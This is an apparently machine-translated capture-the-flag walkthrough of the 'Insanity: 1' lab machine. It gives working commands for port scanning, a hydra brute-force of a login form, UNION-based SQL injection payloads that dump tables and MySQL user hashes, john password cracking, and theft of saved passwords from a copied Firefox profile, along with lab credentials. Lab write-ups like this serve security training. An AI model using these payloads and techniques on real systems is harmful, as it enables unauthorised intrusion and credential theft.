Preface

This target （Insanity: 1） Too much confusing information is given , The process of information collection is like the scurrying back and forth in the melon field , For two afternoons , Look at the progress and stick to it ‍*️！ Who thought the entrance was SQL Inject

Key breakthroughs ： Login password explosion 、SQL Injection acquisition Mysql User name, password 、 Password cracking 、 Read Firefox Cache file .

One 、IP Port detection

sudo arp-scan -l
sudo nmap 172.16.9.18 -p- -sV

You can see that it is only open 21,22,80 port

Two 、21 Port information collection

1.ftp Anonymous logins

ftp 172.16.9.18
user name ：anonymous
password ： empty

There is no information available , Change to another port

Two 、80 Port information collection

1. binding hosts

adopt IP visit ,80 The port interface is as follows , stay hosts File binding domain name and IP, Use the domain name to access , The interface has not changed

2. Scan directory

dirb http://172.16.9.18

The following information is obtained after filtering

http://172.16.9.18/monitoring/login.php
http://172.16.9.18/news/
http://172.16.9.18/news/admin/
http://172.16.9.18/phpmyadmin/
http://172.16.9.18/webmail/src/login.php
among phpmyadmin Can pass admin Log in with an empty password , But a low privilege , There is no other operation

3. Burst code

stay /news A message like a person's name is found here , Go to /news/admin Interface explosion , It turned out that csrftoken

Change the login interface ,hydra Keep blasting

hydra -l Otis -P /usr/share/wordlists/rockyou.txt 172.16.9.18 -f http-post-form “/monitoring/index.php:username=^USER^&password=^PASS^:Sign In”

Use Otis/123456 Try all the login interfaces you have scanned , Find out /webmail You can also log in

4.SQL Inject

Follow the prompt , When the monitored machine breaks down, it will send an email to the mailbox

newly build 1 Servers , Deliberately write error messages , etc. Status Turn into DOWN when , Check your email


host Field first try whether a single double quotation mark may exist SQL Inject

Single quotation marks don't work , Change the double quotation marks and find that it does exist SQL Inject , Next is the library 、 surface 、 The field is one-stop

1、 View all databases

t7" union select 1,2,group_concat(schema_name),4 from information_schema.schemata#

2. Check the current library name and user name

test4" union select 1,database(),user(),4#

3. View all table names in the current library

t9" union select 1,2,group_concat(table_name),4 from information_schema.tables where table_schema = database()#

4. see users All fields in the table

t10" union select 1,2,group_concat(column_name),4 from information_schema.columns where table_name=‘users’#

5. obtain users In the table username and password Field

t11" union select 1,2,group_concat(username),group_concat(password) from monitoring.users#

password Add salt , It can't be cracked , I feel busy for nothing ？

5. Get login mysql The username and password of

Know the current login from the previous step mysql For the root user , from Mysql Know the characteristics of , System libraries （ Library name mysql） in user In the table user and password/autentication_string The fields are encrypted user name and password , Whether the login can be obtained directly from the system library mysql Username and password ？
notes 1： This refers to from the system library （mysql） Of user Data fetching from table , Non original monitoring library ！

notes 2：mysql5.7 System library under version user The table no longer exists password Field ,password Change the field to authentication_string

t12" union select 1,group_concat(user),group_concat(password),group_concat(authentication_string) from mysql.user#

Check the existence root and elliot this 2 Users
Crack root Users and ellioti User password

sudo john --wordlist:/usr/share/wordlists/rockyou.txt pwd.txt

3、 ... and 、ssh Sign in

1. Use elliot/elliot123 Sign in

ssh [email protected]

List the files in the current directory , Check in turn
see .mozilla Find out firefox Folder , Below esmhp32w.default-default The folder is a cache file , By looking up Firefox The information about the browser password related mechanism is known , among logins.json The encrypted user name and password are saved in ,key4.db As the key

2. Transfer cache file to local

take Firefox Cache files are transferred locally

scp -r [email protected]:/home/elliot/.mozilla/firefox/esmhp32w.default-default /home/kali/test1

3.Firefox Read cache file

kali Use... Directly Firefox Open the file

firefox -profile esmhp32w.default-default

View the saved password ：root/S8Y389KJqWpJuSwFqFZHwfZ3GnegUa

8. Switch root user

Use the obtained password to switch root user

notes ： stay Windows in , It is known that logins.json and key4.db this 2 In the case of files , Directly replace this in the local configuration file 2 Files are available Firefox View the user name and password , But in Kali It is not enough to follow the above operation … speechless …

Windows Next step ：Firefox Upper right corner —— help —— More troubleshooting information —— Open configuration folder —— Replace 2 File


Restart the browser to view the password

summary

The key breakthrough of this target plane is the explosion of login password 、SQL Injection acquisition Mysql User name, password 、 Password cracking 、 Read Firefox Cache file .